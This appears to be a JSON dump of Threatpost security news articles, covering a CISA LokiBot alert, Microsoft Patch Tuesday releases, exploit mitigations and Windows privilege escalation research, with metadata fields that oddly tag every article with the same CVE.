The malware steals the data through the use of a keylogger to monitor browser and desktop activity, CISA explained.\n\n\u201cLokiBot has stolen credentials from multiple applications and data sources, including Windows operating system credentials, email clients, File Transfer Protocol and Secure File Transfer Protocol clients,\u201d according to the alert, [issued Tuesday](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>). \u201cLokiBot has [also] demonstrated the ability to steal credentials from\u2026Safari and Chromium and Mozilla Firefox-based web browsers.\u201d\n\nTo boot, LokiBot can also act as a backdoor into infected systems to pave the way for additional payloads.\n\nLike its Norse namesake, LokiBot is a bit of a trickster, and disguises itself in diverse attachment types, sometimes using steganography for maximum obfuscation. For instance, the malware has been disguised as a .ZIP attachment [hidden inside a .PNG file](<https://threatpost.com/lokibot-trojan-spotted-hitching-a-ride-inside-png-files/143491/>) that can slip past some email security gateways, or [hidden as an ISO disk image](<https://threatpost.com/malspam-emails-blanket-lokibot-nanocore-malware-with-iso-files/145991/>) file attachment.\n\nIt also uses a number of application guises. \u201cSince LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications,\u201d CISA noted. 
For instance, in February, it was seen [impersonating a launcher](<https://www.trendmicro.com/en_us/research/20/b/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file.html>) for the popular Fortnite video game.\n\nOther tactics include the use of zipped files along with malicious macros in Microsoft Word and Excel, and leveraging the exploit [CVE-2017-11882](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>) (a memory corruption issue in the Office Equation Editor that runs attacker code as soon as the victim opens the document, with no macros to enable). The latter is done via malicious RTF files, researchers have observed.\n\nIn addition, researchers [have seen the malware being sold](<https://threatpost.com/u-s-manufacturer-most-recent-target-of-lokibot-malspam-campaign/148153/>) as a commodity in underground markets, with versions selling for as little as $300.\n\nWith all of these factors taken together, LokiBot represents \u201can attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases,\u201d according to CISA.\n\nSaryu Nayyar, CEO at Gurucul, noted that the advisory is another indication of how malware authors have turned their malicious activities into a scalable business model.\n\n\u201cThe fact that LokiBot has been around for over four years and has gained in capability over time is a reflection of how much malicious actors have advanced the state of their art, leveraging the same development models we use in the commercial space,\u201d she said, via email.\n\nTo protect themselves, CISA said that companies should keep patches up to date, disable file- and printer-sharing services if not necessary, enforce multi-factor authentication and strong passwords, enable personal firewalls and scanning of downloads, and implement user education on how to exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known.\n", "cvss3": {}, 
"published": "2020-09-23T15:27:18", "type": "threatpost", "title": "CISA: LokiBot Stealer Storms Into a Resurgence", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-09-23T15:27:18", "id": "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "href": "https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:08:47", "description": "[](<https://threatpost.com/attacks-continuing-against-ie-flaw-microsoft-preps-patch-011810/>)Microsoft officials said on Sunday that they are continuing to investigate the attacks that are exploiting the unpatched flaw in Internet Explorer, but that the attacks right now are limited to specifically targeted activity against enterprise networks.\n\nThe company said that it doesn\u2019t look like any of the attacks are being targeted at consumers, and that they are only effective against machines running IE 6, which doesn\u2019t include many of the advanced memory protections that are part of IE7 and IE8. [Microsoft is recommending](<http://blogs.technet.com/msrc/>) that customers running older versions of Windows XP and IE6 upgrade in order to take advantage of those memory protections.\n\nThat said, we remain vigilant about this threat evolving and want to be \nsure our customers take appropriate action to protect themselves. That \nis why we continue to recommend that customers using IE6 or IE7, [upgrade to IE8](<http://www.microsoft.com/downloads/details.aspx?FamilyID=68C48DAD-BC34-40BE-8D85-6BB4F56F5110&displaylang=en>) \nas soon as possible to benefit from the improved security protections \nit offers. Customers who are using Windows XP SP2 should be sure to \nupgrade to both IE8 and enable Data Execution Protection (DEP), or [upgrade to Windows XP SP3](<http://support.microsoft.com/kb/322389>) \nwhich enables DEP by default, as soon as possible. 
Additionally \ncustomers should consider implementing the workarounds and mitigations \nprovided in the Security Advisory.\n\nMicrosoft\u2019s next scheduled patch release isn\u2019t until mid-February, but given that there is public exploit code available and that the vulnerability has been used in known attacks, the company could release an emergency out-of-band patch before then.\n", "cvss3": {}, "published": "2010-01-18T14:11:24", "type": "threatpost", "title": "Attacks Continuing Against IE Flaw as Microsoft Preps Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:42:32", "id": "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "href": "https://threatpost.com/attacks-continuing-against-ie-flaw-microsoft-preps-patch-011810/73380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:09", "description": "Microsoft launched a new transparency website this week that bundles reports detailing requests for data the company has received, including those from law enforcement, the government, and elsewhere.\n\nThe page, which Microsoft is calling its [Transparency Hub](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/>), is somewhat similar to [what Apple did last month](<https://threatpost.com/apple-goes-all-in-on-privacy/114846/>) when it looped all of its transparency reports together on one page.\n\nWhile Microsoft has issued transparency reports regarding requests from law enforcement and the U.S. 
government in the past, this is the first time it\u2019s broken down requests the company has received from other parties to outright remove content on sites such as its search engine Bing.\n\nLike the other two reports, the \u201c[Content Removal Requests Report](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/crrr/>)\u201d pertains to requests from the first six months of the calendar year. The main difference is this report mostly culls information on requests from other governments, requests from European residents citing a special European Court of Justice ruling, and requests from copyright owners claiming their work was infringed.\n\nAccording to the report, China far and away had the most requests for content to be removed, with 165 requests filed compared to 11 from the United States, and 10 from Austria, Germany, Russia, and the U.K. combined. The report doesn\u2019t specify exactly what the content was or where it was located, but claims the numbers are from Microsoft entities like Bing, OneDrive, and MSN.\n\nThere were many more requests to remove copyrighted information, just north of one million, according to Microsoft. In this case, it was usually URLs that were being shown in Bing searches that contained copyrighted material. Microsoft claims it complied with 92 percent of requests. Since this is an inaugural report however, there are no statistics from last year to compare the numbers to.\n\nThe company received 3,546 requests from European residents to remove results for queries in Bing that included their name. A rule passed last year called the \u2018Right To Be Forgotten\u2019 rule allows users to ask their name be removed if the results were inadequate, inaccurate or no longer relevant. Microsoft complied with 50 percent of those requests.\n\nAs far as law enforcement requests, Microsoft received 35,228, a slight uptick from the second half of 2014 when it received 31,002. 
The report claims only three percent of requests it received led to the disclosure of content customers created, shared or stored on its services. The company rejected 12 percent of requests, up from 7.5 percent in the second half of last year.\n\nThe company, as it\u2019s done for the past several years, also claims it received somewhere [between zero and 999 National Security Letters](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/fisa/>). The government only permits companies to disclose requests in bands of 1000, which explains the vague number.\n\nThe company got permission to start sharing information pertaining to legal demands they receive in early 2014 but has been posting the reports pertaining to law enforcement twice a year [since 2013](<https://threatpost.com/microsoft-transparency-report-shows-company-supplied-user-content-22-cases-032113/77653/>), largely in response to a growing demand for transparency from big data companies in the post-Snowden world.\n", "cvss3": {}, "published": "2015-10-15T15:32:57", "type": "threatpost", "title": "Latest Microsoft Transparency Report Details Content Removal Requests", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-15T19:32:57", "id": "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "href": "https://threatpost.com/latest-microsoft-transparency-report-details-content-removal-requests/115062/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:15", "description": "Microsoft today re-released [security bulletin MS14-045](<http://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809>), which was pulled shortly after the [August Patch Tuesday updates](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) because a number of users reported crashes and blue screens. 
The patch was removed from Windows Update on Aug. 15, three days after it was released as part of Microsoft\u2019s monthly patch cycle.\n\n\u201cAs soon as we became aware of some problems, we began a review and then immediately pulled the problematic updates, making these unavailable to download,\u201d said Tracey Pretorius, director, Trustworthy Computing at Microsoft. \u201cWe then began working on a plan to rerelease the affected updates.\u201d\n\n[MS14-045](<https://technet.microsoft.com/en-us/library/security/ms14-045.aspx>) patched vulnerabilities in kernel-mode drivers that were rated important by Microsoft because they require valid credentials and local access in order to exploit. Successful exploits could have led to an elevation of privileges on a compromised Windows machine.\n\nMicrosoft said at the time that a font issue patched in the update was the culprit causing the reported system crashes. Microsoft said that only a small number of computers were affected. There were other issues with the bulletin, the most serious causing systems to crash and render a 0x50 Stop error message after installation. Users were also seeing \u201cFile in Use\u201d error messages because of the font issue in question.\n\nThe bugs affect Windows systems all the way back to Windows Server 2003 and all supported desktop versions of Windows. Windows Update users will automatically get the patch, otherwise, Microsoft urges users to install the update.\n\nThis month\u2019s update had a distinct IE feel to it with another cumulative update patching 26 vulnerabilities in Microsoft\u2019s flagship browser, including a publicly reported vulnerability that is likely being exploited in the wild. All 26 vulnerabilities were rated critical and could be remotely exploited.\n\nThe update came on the heels of an announcement at the start of the month alerting users that Microsoft would, in 18 months, no longer support older versions of the browser. 
With a rash of zero-days and high profile exploits targeting older versions of IE, such as 6, 7 and 8, Microsoft made it clear that users should use only a current browser with modern memory exploit mitigations built in.\n\nMicrosoft also announced it would be [blocking older ActiveX controls in Internet Explorer](<http://threatpost.com/ie-to-block-older-activex-controls-starting-with-java/107672>), starting with out of date versions of Java, another platform heavily targeted by hackers.\n\nThe next scheduled Patch Tuesday security bulletins release is set for Sept. 9.\n", "cvss3": {}, "published": "2014-08-27T14:08:58", "type": "threatpost", "title": "Microsoft Re-Releases Broken Security Patch MS14-045", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T12:04:44", "id": "THREATPOST:2DAD0426512A1257D3D75569F282640E", "href": "https://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:13", "description": "Microsoft today announced a relatively light load of patches will be delivered on [Patch Tuesday](<https://technet.microsoft.com/library/security/ms14-sep>) next week, along with some numbers that demonstrate public vulnerability disclosures continue to rise.\n\nFour security bulletins, one rated critical, are scheduled to be released next Tuesday. In what\u2019s becoming customary for Patch Tuesday, administrators can expect another cumulative patch roll-up for Internet Explorer addressing a number of remote code execution vulnerabilities in the browser.\n\nThe three remaining bulletins, all rated important by Microsoft, include a privilege-escalation bug in Windows 8 and 8.1 as well as Windows Server 2012 and RT. 
Another bulletin patches a .NET denial-of-service vulnerability in Windows Server 2003, 2008 and 2012, and on the client side OS back to Vista.\n\nAnother denial-of-service bug is expected to be patched in Microsoft\u2019s Lync instant messaging and collaboration software.\n\n\u201cThe few number of patches expected out next week doesn\u2019t mean you can take a pass on patching this month however,\u201d cautions Russ Ernst, director, product management, Lumension.\n\nLast month, Microsoft patched IE with a [cumulative update that addressed 26 vulnerabilities](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) including one exploited in the wild. The news out of last month\u2019s batch of bulletins, however, was a faulty patch, MS14-045, that was [re-released after users complained of crashes and blue screens of death](<http://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953>). The bulletin addressed vulnerabilities in kernel-mode drivers, and Microsoft blamed font issues for the system crashes.\n\nIn the meantime, Microsoft points out in a separate announcement that public vulnerability disclosures are approaching levels matching the first half of 2012, and that more than 4,000 disclosures have been made annually since the start of 2011. That number is still well shy of the 7,000 disclosed in the 2006-2007 timeframe, Microsoft said.\n\nFor the last half of 2013, for example, disclosures across the industry were up 6.5 percent from the start of the year, and up 12.6 percent from the second half of 2012. The severity of disclosures, however, is down. 
A little more than six percent of bugs scored 9.9 or greater on the CVSS standard in the second half of 2013, down from almost 13 percent in the first six months of the year.\n\n\u201cVulnerability complexity is an important factor to consider in determining the magnitude of the threat that a vulnerability poses,\u201d wrote Microsoft\u2019s Tim Rains in the [report](<http://blogs.technet.com/b/security/archive/2014/09/03/industry-vulnerability-disclosures-trending-up.aspx>). \u201cA high-severity vulnerability that can only be exploited under very specific and rare circumstances might require less immediate attention than a lower-severity vulnerability that can be exploited more easily.\u201d\n\nDisclosures of medium- and low-complexity bugs, posing the highest risk to users, far outnumber disclosures of high-complexity vulnerabilities, Microsoft said.\n\nDisclosures in third-party applications such as media players or Web components such as Flash or Java continue to rise, up 34.4 percent in the latter half of 2013 and accounting for 58 percent of disclosures during that timeframe. Operating system vulnerability disclosures, meanwhile, were down 46 percent and accounted for 15 percent of total disclosures. Browser bugs were also down 28 percent and made up 10 percent of overall disclosures.\n\nMicrosoft also examined disclosures for its products, 174 in the second half of 2013, up 2 percent from the first six months. 
Microsoft disclosures account for 7 percent of industry disclosures, down slightly from the start of the year.\n", "cvss3": {}, "published": "2014-09-04T15:07:28", "type": "threatpost", "title": "September 2014 Microsoft Patch Tuesday advance notification", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T19:07:28", "id": "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "href": "https://threatpost.com/patch-tuesday-includes-another-ie-update-vuln-disclosures-up/108098/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:41", "description": "One zero-day down, one to go.\n\nAs expected, Microsoft did today patch a zero-day in its GDI+ graphics component ([MS13-096](<https://technet.microsoft.com/en-us/security/bulletin/ms13-096>)) reported more than a month ago after exploits were spotted in the wild. The fix was one of 11 security bulletins\u2014five critical\u2014released as part of the December 2013 Patch Tuesday security updates.\n\nAnother zero-day, one affecting only Windows XP users, still remains [unpatched despite active exploits](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) targeting the vulnerability, which is found in the NDProxy driver that manages the Microsoft Telephony API. The attacks depend on a second vulnerability to deliver the exploit against an XP machine. Microsoft recommends turning off NDProxy as a mitigation until a patch is available.\n\nWhile there were five critical bulletins released today, experts urge IT administrators to also prioritize an ASLR bypass vulnerability that was patched today and rated \u201cimportant\u201d by Microsoft.\n\n[MS13-106](<https://technet.microsoft.com/en-us/security/bulletin/ms13-106>) takes care of an Office vulnerability that is being exploited in the wild, Microsoft said. 
Attackers hosting a malicious exploit online can trigger the vulnerability in the hxds.dll that enables a bypass of ASLR or Address Space Layout Randomization, a security feature in Windows that mitigates memory corruption exploits.\n\n\u201cThe vulnerability could allow security feature bypass if a user views a specially crafted webpage in a web browser capable of instantiating COM components, such as Internet Explorer,\u201d Microsoft said in its advisory. \u201cThe security feature bypass by itself does not allow arbitrary code execution. However, an attacker could use this ASLR bypass vulnerability in conjunction with another vulnerability, such as a remote code execution vulnerability that could take advantage of the ASLR bypass to run arbitrary code.\u201d\n\nASLR bypasses have been more frequent this year, and have been rolled into a number of exploit kits. Introduced in Windows Vista, ASLR hampers the reliability of exploits by negating an attacker\u2019s ability to predict where machine instructions will exist in memory. ASLR is particularly effective against buffer overflow attacks.\n\n\u201cThis particular library, hxds.dll, has been used by numerous attacks in the wild with great success because it can be easily loaded into memory from a web page by using the \u2018ms-help:\u2019 protocol handler,\u201d said Craig Young, security researcher at Tripwire. \u201cUntil today, the only options that protect against this were the removal of Office 2007/2010 installs or enabling Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET).\u201d\n\nAdmins will also have to contend with yet another cumulative update for Internet Explorer. [MS13-097](<https://technet.microsoft.com/en-us/security/bulletin/ms13-097>) patches a number of remote code execution vulnerabilities in the browser, all the way back to IE 6. 
IE has been patched almost monthly this year and has been front and center in numerous targeted attacks.\n\nMicrosoft also patched a critical bug in its Authenticode signing algorithm that is being exploited. [MS13-098](<https://technet.microsoft.com/en-us/security/bulletin/ms13-098>) addresses a vulnerability that allows remote code execution if a user is enticed to run an application that contains a malicious, signed portable executable (PE) file. The patch modifies how the WinVerifyTrust function handles Windows Authenticode signature verification for PE files, Microsoft said.\n\n\u201cAttackers have been abusing installers from legitimate software makers to install malware. These installers are configured in a way to dynamically download code extensions that are not checked for correct signatures, and attackers have found a way to piggyback on that mechanism,\u201d said Qualys CTO Wolfgang Kandek, who added that the patch prepares the system for a more stringent integrity check that prevents such exploits. Microsoft also issued a separate [security advisory](<http://technet.microsoft.com/en-us/security/advisory/2915720>) regarding the Authenticode patch, stating that after June 10, 2014, Windows will no longer recognize non-compliant signed binaries.\n\nThe two remaining critical bulletins, [MS13-099](<https://technet.microsoft.com/en-us/security/bulletin/ms13-099>) and [MS13-105](<https://technet.microsoft.com/en-us/security/bulletin/ms13-105>), patch remote code execution vulnerabilities in Microsoft Scripting Runtime Object Library and Exchange Server respectively. Three of the four Exchange vulnerabilities addressed in the bulletin, it\u2019s worth noting, are publicly disclosed. 
The most serious is in the WebReady Document Viewing and DLP features of Exchange Server, Microsoft said.\n\nThe remaining bulletins\u2014rated \u201cimportant\u201d\u2014address one remote code execution bug, three privilege escalation issues and an information disclosure vulnerability:\n\n * [MS13-100](<https://technet.microsoft.com/en-us/security/bulletin/ms13-100>) patches a remote code execution vulnerability in Microsoft SharePoint Server; an attacker would have to be authenticated to the server to exploit the vulnerability. A successful exploit would enable an attacker to run code in the context of the W3WP service account on the SharePoint site.\n * [MS13-101](<https://technet.microsoft.com/en-us/security/bulletin/ms13-101>) fixes a privilege elevation issue in Windows Kernel-Mode Drivers. An attacker would have to log onto a system and run a malicious application to exploit the bug.\n * [MS13-102](<https://technet.microsoft.com/en-us/security/bulletin/ms13-102>) is a patch for a vulnerability in the LRPC Client that would allow an attacker to elevate their privileges on an LRPC server. Doing so would allow an attacker to install programs, manipulate data or create accounts. Valid credentials are needed to exploit this bug.\n * [MS13-103](<https://technet.microsoft.com/en-us/security/bulletin/ms13-103>) patches a vulnerability in ASP.NET SignalR that could elevate an attacker\u2019s privileges if they are able to reflect JavaScript back to the user\u2019s browser. Microsoft also issued an [advisory](<http://technet.microsoft.com/en-us/security/advisory/2905247>) for a flaw in ASP.NET view state that exists when Machine Authentication Code (MAC) validation is disabled through configuration settings.\n * [MS13-104](<https://technet.microsoft.com/en-us/security/bulletin/ms13-104>) is a fix for an information disclosure vulnerability in Microsoft Office. 
Successful exploits could give an attacker access tokens used to authenticate a user on a SharePoint or Office server site.\n\nMicrosoft also sent out an [advisory](<http://technet.microsoft.com/en-us/security/advisory/2871690>) that revokes the digital signatures for nine private, third-party UEFI modules for Windows 8 and Windows Server 2012 machines. These modules would be loaded during a UEFI Secure Boot, if it is enabled.\n", "cvss3": {}, "published": "2013-12-10T16:09:59", "type": "threatpost", "title": "December 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-12T20:37:55", "id": "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "href": "https://threatpost.com/microsoft-patches-gdi-zero-day-experts-urge-close-look-at-important-aslr-bypass-patch/103157/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:58", "description": "LAS VEGAS \u2014 It wasn\u2019t long ago that ROP, or return-oriented programming, was a hacker\u2019s best friend when it came to bypassing mitigations against memory-based attacks such as DEP and ASLR.\n\nROP, however, is so 2005. In the last couple of years, researchers and attackers have figured out how to bypass popular tools such as Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET), without the need for ROP. Exploit kits, for example have integrated attacks that have moved up the exploitation stack closer to memory and before code is written to disk. All the while, defenders still focus on post-exploitation techniques (i.e., ROP) that are obsolete today.\n\nThis week at Black Hat USA 2016 in Las Vegas, researchers at Endgame are expected to introduce new defensive techniques that could level the playing field. 
Their approach is called Hardware Assisted Control Flow Integrity (HA-CFI), which leverages features in the micro-architecture of Intel processors, such as the performance monitoring unit (PMU), for security.\n\n\u201cDuring the last two years, academics have been using it for security purposes,\u201d said Cody Pierce, Endgame director of vulnerability research. \u201cWe\u2019re continuing the idea of using hardware features to implement a security check. That\u2019s where CFI comes in and monitors the PMU to get real-time views into protected processes.\u201d\n\nWhere tools such as EMET catch attacks in the post-exploitation stage of an attack, HA-CFI operates in the exploitation stage before bypasses happen.\n\n\u201cIt\u2019s generic in the fact it has no knowledge of exploit techniques, and doesn\u2019t know about ROP; the system is autonomous,\u201d Pierce said. \u201cWhat it\u2019s looking for is an abnormal change in execution. Usually this is the absolute first step of exploits. They will redirect execution from normal- to attacker-controlled execution. That\u2019s a very specific thing that we\u2019re hoping to pick up on.\n\n\u201cAn analogy to malware would be that you would want to pick up detection of malware before it\u2019s written to disk,\u201d Pierce said. \u201cYou don\u2019t want to wait until it runs and sets up persistence and backdoors.\u201d\n\nMicrosoft implemented [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) starting with Visual Studio 2015, and it runs only on x86 and x64 releases on Windows 8.1 and Windows 10. CFG restricts where applications can execute code from, Microsoft said, cutting into the effectiveness of code execution attacks and buffer overflow exploits. Pierce said CFG has its limitations, specifically that it can run only on the latest compilers and OSes, requiring organizations to recompile their applications in order to use it. 
HA-CFI would operate at runtime, and its biggest limitation, Pierce said, is a performance overhead that could be 3x higher than Microsoft\u2019s, requiring organizations to consider that tradeoff when protecting commonly exploited apps such as browsers, Office and Flash.\n\nAs for ROP being on life support, a number of prominent researchers have been developing new approaches to mitigation bypasses that are putting those attacks out to pasture. [Yang Yu](<https://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328/>), a two-time [Microsoft bounty winner](<https://threatpost.com/patched-badtunnel-windows-bug-has-extensive-impact/118697/>), really got the ball rolling with a 2014 Black Hat talk called [Write Once, Pwn Anywhere](<https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf>) where he was able to change a value in memory that allowed his attack to bypass native restrictions and execute commands sans ROP. The Hacking Team dump of last summer also showed that other professionals had [moved beyond ROP](<https://threatpost.com/curious-tale-of-a-microsoft-silverlight-zero-day/115873/>) with a slate of attacks that [bypass EMET](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) and other mitigations.\n\n\u201cFrom an exploit writer\u2019s perspective, you don\u2019t want to have to do more work than necessary, and we\u2019ve learned ROP is a little unnecessary,\u201d Pierce said, adding that some of these techniques that have become public in the last 12-18 months have made it easier to develop more powerful exploits.\n\n\u201cWith ROP, usually some work has to be done to get all versions of apps you want to exploit,\u201d Pierce said. 
\u201cThese advanced approaches eliminate that need.\u201d\n", "cvss3": {}, "published": "2016-08-01T13:00:22", "type": "threatpost", "title": "HA-CFI Technique Checks Mitigation Bypasses Earlier", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-07-29T19:00:17", "id": "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "href": "https://threatpost.com/new-technique-checks-mitigation-bypasses-earlier/119568/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:00", "description": "[](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/>)Ten years.\n\nThat\u2019s a really long time. Think about what you were doing 10 years ago. Can you even remember? Maybe you were in college or high school, or cripes, even grade school. Or maybe you were working in security already, trying to figure out why your network kept getting overrun by viruses and attackers. \nYou know what Microsoft was doing 10 years ago?\n\nMaking really, really buggy software and watching its customers get owned left and right.\n\nThe early part of the 2000s was not a good time for the folks in Redmond. The company was taking a serious public beating for the instability and insecurity of its software, especially Internet Explorer, Outlook and Windows. VB script viruses such as I Love You, Melissa and others were running wild and large enterprise customers were screaming and pounding their shoes on the table and demanding answers from Microsoft.\n\nAnd Microsoft didn\u2019t have any.\n\nThe company had spent the last few years defending itself against the [Department of Justice\u2019s antitrust suit](<https://en.wikipedia.org/wiki/United_States_v._Microsoft>) centered on its Windows-IE monopoly. Much of its energy and resources\u2013not to mention money\u2013were devoted to the case, which Microsoft ultimately lost. 
Then, when the dust settled and company officials began looking around to see what had been going on while they were buried in federal courtrooms for three years, what they found was something like the information age version of the angry mob of villagers with torches and pitchforks.\n\nTo say that customers were not happy would be like saying Bill Gates has some money tucked away.\n\nAs it turned out, it was Gates himself who would provide the spark that would ultimately light a fire under the thousands of developers, product managers and engineers in Redmond to make security not just a priority, but the priority.\n\nThe email that Gates sent on Jan. 15, 2002, has come to be known as the [Trustworthy Computing memo](<https://threatpost.com/what-if-bill-gates-never-wrote-trustworthy-computing-memo-022410/>) and it is often pointed to as the origin of any sort of security awareness at Microsoft. But that\u2019s not really the case. [Gates\u2019s email](<http://www.computerbytesman.com/security/billsmemo.htm>) may have been the first real public expression of that sentiment, but some people inside the company had been thinking along those lines for some time.\n\nThe first step is admitting you have a problem, of course. But then you have to do something about it.\n\nA few months before Gates sent his email, Microsoft held a small conference in Redmond on what it then called trusted computing, bringing in a series of software security experts to discuss the principles and concepts that are the foundation of building more secure software. There were a few reporters there and some security researchers and the fascinating thing about it was that it was not Microsoft officials preaching their ideas to the audience, but trying to learn from the assembled experts. 
Odd.\n\nAnd well before Gates pushed the button on his email, there were people inside the company talking about the same concepts\u2013reliability, robustness and resistance to attack\u2013and advocating that developers build their applications around them.\n\nIn the months following the publication of Gates\u2019s email, Microsoft began a number of painful internal changes designed to refocus its developers around the idea of building secure software. Until then, the ship-or-die mentality had reigned supreme inside the company and features and functionality were the two-headed god that every developer worshipped. The chances of a team stopping shipment because of a security problem at that point were zero point zero zero.\n\nBut within a few months of Gates\u2019s memo, that\u2019s exactly what happened. The company stopped development on several major products in order to put their developers through security training. Since then, the company has developed and released a slew of software security tools and methodologies and somehow turned Microsoft from the butt of every joke in the industry into an organization that\u2019s seen as doing it the right way.\n\nBut it wasn\u2019t just Microsoft that began changing in those days. The turnaround initiated by the company and Gates also took hold in the wider software industry and other industries, albeit much more slowly and spottily. After Microsoft\u2019s public declaration of the need for change, the sentiment began to spread to some of its larger customers. 
Then, more and more financial services firms, insurance companies, telecoms and other companies got on board, starting their own software security programs.\n\nBy the middle to latter part of the decade, Microsoft not only wasn\u2019t the object of every joke in the security community, it was being used as an example of how to do things right, how to get your collective stuff together and fix what\u2019s broken.\n\nSo, what Gates\u2019s memo turned out to be was not just a directive for Microsoft developers, but a call to arms for the rest of the industry, as well. It was by no means the beginning of the software security movement. Not even close. But it was, in fact, the beginning of something different and perhaps more important: widespread acceptance that software security needed to be a top priority.\n\nEven for Microsoft.\n\n*Microsoft homepage image via [SeattleClouds.com](<http://www.flickr.com/photos/42106306@N00/>)\u2018s Flickr photostream\n", "cvss3": {}, "published": "2012-01-12T14:43:00", "type": "threatpost", "title": "Ten Years After Gates's Memo, Effects Still Being Felt", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:00", "id": "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "href": "https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/76089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:23", "description": "Microsoft\u2019s problems with [Token Kidnapping](<http://www.argeniss.com/research/TokenKidnapping.pdf>) [.pdf] on the Windows platform aren\u2019t going away anytime soon.\n\nMore than a year after Microsoft issued a [patch](<http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx>) to cover privilege escalation issues that could lead to complete system takeover, a security researcher plans to use the Black Hat conference spotlight to expose new design mistakes and 
security issues that can be exploited to elevate privileges on all Windows versions including the brand new Windows 2008 R2 and Windows 7.\n\nCesar Cerrudo, founder and CEO of Argeniss, a security consultancy firm based in Argentina, first reported the token kidnapping hiccup to Microsoft in 2008 and after waiting in vain for a patch, he released the details during the [Month of Kernel Bugs](<http://projects.info-pull.com/mokb/MOKB-06-11-2006.html>) project.\n\nThe flaw would eventually be [exploited in active attacks](<http://www.zdnet.com/blog/security/one-year-old-unpatched-windows-token-kidnapping-under-attack/2894>), leading to a mad scramble at Redmond to come up with a fix and a subsequent [disclosure flap](<http://www.zdnet.com/blog/security/responsible-disclosure-the-microsoft-way/157>) that exposed Microsoft as the irresponsible party.\n\nThis year, Cerrudo plans a new talk titled \u201cToken Kidnapping\u2019s Revenge\u201d where he will discuss how attackers can even bypass certain Windows services protections.\n\nIn an interview with Threatpost, Cerrudo said the presentation will discuss about a half-dozen vulnerabilities in all Windows versions from XP to Windows 7 that can be exploited to elevate privileges by any user with impersonation rights. \n\nThe explanation:\n\n_Most Windows services accounts have impersonation rights. Because impersonation rights are needed these are not critical, high risk vulnerabilities; regular Windows users can\u2019t exploit them. Some applications are more susceptible to exploitation of these vulnerabilities than others, for instance, if you can upload ASP web pages with exploit code to a MS Internet Information Server (IIS) 6, 7 or 7.5 running in default configuration you will be able to fully compromise the Windows server. _\n\nFor example, if you are an SQL Server administrator (which is not a Windows administrator) you can exploit these vulnerabilities from SQL Server and fully compromise the Windows server. 
